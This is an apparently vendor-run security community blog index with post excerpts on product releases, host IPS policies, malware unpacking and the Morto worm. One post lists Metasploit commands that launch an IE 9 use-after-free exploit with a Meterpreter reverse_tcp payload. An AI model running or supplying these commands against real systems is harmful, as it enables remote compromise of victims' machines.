Video Screencast Help
Search Video Help Close Back
to help

Security Community Blog

Showing posts tagged with Critical System Protection
Showing posts in English
Maintaining Systems
Pritesh J. Chauhan | 11 Oct 2012 | 0 comments

 

Over the last few weeks we have been working with a number of customers who have large administrative overheads when protecting their IT Infrastructure.

 

When selecting a new service they have either gone to tender or bought an off the shelf solution upon recommendation from colleagues/friends. 

 

Whilst this may seem great at first, over the years this has built up a number of systems each requiring their own management systems, portals, update systems and most importantly, they lack integration between solutions. Whilst this may seem like a large problem, it gets worse - the issue with these customers was that they had multiple products performing conflicting tasks. 

 

One example from a customer who had one product that is designed to AV scan contents of a USB pen drive upon connection to the machine. Another product to encrypt USB pen drives upon connection. This is great if the admin could...

Read more
Vulnerability
Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2

Metasploit:

- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Read more
Send us your cloud security experiences from the field!
Beverly van de Velde | 29 Mar 2012 | 0 comments

Education Enablement Services is developing a Symantec Cloud Security Essentials course that combines the CSA training in order to achieve the CCSK credential & a Symantec Certified Professional (SCP) in Cloud Security credential. 

This is an open call for your experiences with reviewing, designing, or implementing security solutions in a cloud environment.  These could come from situations unique to the cloud (ex. compliance issues for systems in a public cloud) - OR - general security solutions addressed in cloud environments (ex. how existing encryption policies were applied to a cloud architecture). 

We need your:
• Specific examples of security solutions in cloud environments
• Example cloud architectures – good or bad – implemented by customers
• Key questions, challenges, and concerns from customers migrating their infrastructure to cloud
...

Read more
Symantec Protection Center 2.1 (2.1.0.2075) Released
rscovel | 19 Dec 2011 | 4 comments

Symantec Protection Center 2.1 (SPC) has been released!

The Symantec Protection Center Team is proud to announce the release of Symantec Protection Center 2.1 (2.1.0.2075), which was published today to the LiveUpdate Publishing Service.  SPC 2.0 Customers will be notified that an update to SPC is available for download.  This is a LiveUpdate release only.  This update provides fixes for a small number of defects, as well as several major enhancements.

These enhancements include:

  • New Security Audit functionality, and reports
  • New Intrusion Detection System (IDS) signature reports
  • An enhanced Specific Endpoint report
  • SPC Web Interface security certificate management
  • Updated browser compatibility

Full details are found in the SPC 2.1 Release notes (DOC4967...

Read more
New Policies in Critical System Protection Help Organizations Move from Host IDS to IPS with Confidence
Stuart_Hawkins | 16 Dec 2011 | 0 comments

Many organizations are using Critical System Protection to monitor system activity and alert if and when a host has been compromised. As the attacks to servers become more sophisticated, it’s becoming more important for organizations to block malicious activity automatically - whether the attack originates from internal or external parties - to prevent further incursion of their environment.

 

What has prevented a number of customers from moving to host IPS is the fear of false positives, and what impact the prevention may have on the applications or server workloads being supported.

 

With the most recent release of Critical System Protection customers are now able to selectively enable prevention policies without the fear of stopping critical business processes.

 

Targeted Prevention Policy (available in the...

Read more
Manual Unpacking of Malware Samples
Dinesh Theerthagiri | 17 Nov 2011 | 1 comment

This article presents information on manual unpacking of protected malicious Windows executables using the OllyDbg debugger. It also involve in fully rebuild the import table so the file can be restored to its original state and executed. Many anti-virus vendors categorized UPX, NsPack, ASpack and many other PE packers as malicious software.

Packers ???

A 'Packer' is a compression routine that squeezes an executable file. These programs created to reduce disk space and make downloads faster. It makes difficult to understand the original file and make it tricky to match the file signature of a compressed file. Packers initially send PE internal structures and then it identifies PE header, Export table, and import table in new structures & attaches code segment before OEP, called as STUB .i.e. the compressed executable is shifted to data section of newly created file. PE header & section header is no more useful since data is compressed means...

Read more
Announcing the release of Symantec Protection Center 2.0 Release Update 1
rscovel | 25 Oct 2011 | 0 comments

The Protection Center Team is proud to announce the release of Symantec Protection Center 2.0 Release Update 1 (SPC RU1), which was published today to the LiveUpdate Publishing Service.  SPC 2.0 Customers will be notified that an update to SPC is available for download.  This is a LiveUpdate release only.  This update provides fixes for a small number of defects and also the ability for SPC customers with Symantec Web Gateway (SWG) 5.0.2 (and later) and Symantec Critical Systems Protection (CSP) 5.2.8 (and later) applications to integrate with the SPC Dashboard. 

Symantec Protection Center is a centralized security management console that enables organizations to identify emerging threats, prioritize tasks and accelerate time to protection based on relevant, actionable intelligence. Through a combination of process automation and security intelligence, it enables users to take timely, targeted action to remediate incidents and proactively...

Read more
Domo Arigato Mr. Morto.....or........Helllooo? Morto?
Brandon Noble | 01 Sep 2011 | 0 comments

Over the weekend, Microsoft and F-secure issued warnings about a new global threat called “Morto”, and The Internet Storm Center has been seeing a large spike in traffic on Port 3389.

The spike looks to have been caused by the RDP (Remote Desktop) portion of the worm calling around looking for RDP connections. Once it finds one, it uses a small list of weak passwords and  ..pwnage ensues.

Symantec detects this threat as W32.Morto and Security Response and will continue to perform deeper analysis throughout the next several days. So far, they have uncovered several dozen different MD5s that are all part of this same threat family.

 

Signs of Morto in your environment

As we learned with W32.Downadup:
Brute force attacks + Small list of passwords = Account lockouts....

Read more
Symantec Cybercrime Index Portal...
SecuredThatToo | 17 Feb 2011 | 1 comment

Symantec just announced a pretty cool, interactive, free tool to help stay abreast of security trends and activities.  It even has historical data!  There’s an online version, a installable Windows gadget and you can access it via your mobile phone!  It's pretty slick!

Online Web Portal:
http://www.nortoncybercrimeindex.com

Windows Gadget Download:
http://www.norton.com/ProtectYourself

Mobile:
http://www.nortoncybercrimeindex.mobi

Check it out!!!

Thanks,
Min Ju

Read more
Security Solutions Contest - Be King For a Week!
Hear4U | 31 Mar 2011 | 0 comments

Here's your chance to be "King for a Week" with our new Security Solutions Contest! 

What Is the Security Solutions Contest?
It's all about solving end user questions in the forums area.  We created this contest to help increase the total number of solutions on the Security Community.  We are going to select threads we'd like you to solve, and give you an opportunity to win a weekly prize. Yes, I said "weekly!"  Keep reading to find out more about the prize!

How Do I Participate?
First, if you want to play, pull out your dust-ridden, coffee stained endpoint protection & related security product manuals, re-read all the latest and greatest knowledge base articles, and put your thinking-caps on! 

Why?  Because to be the "King for a Week" in this contest, you need to be able to solve popular forum threads that will be hand...

Read more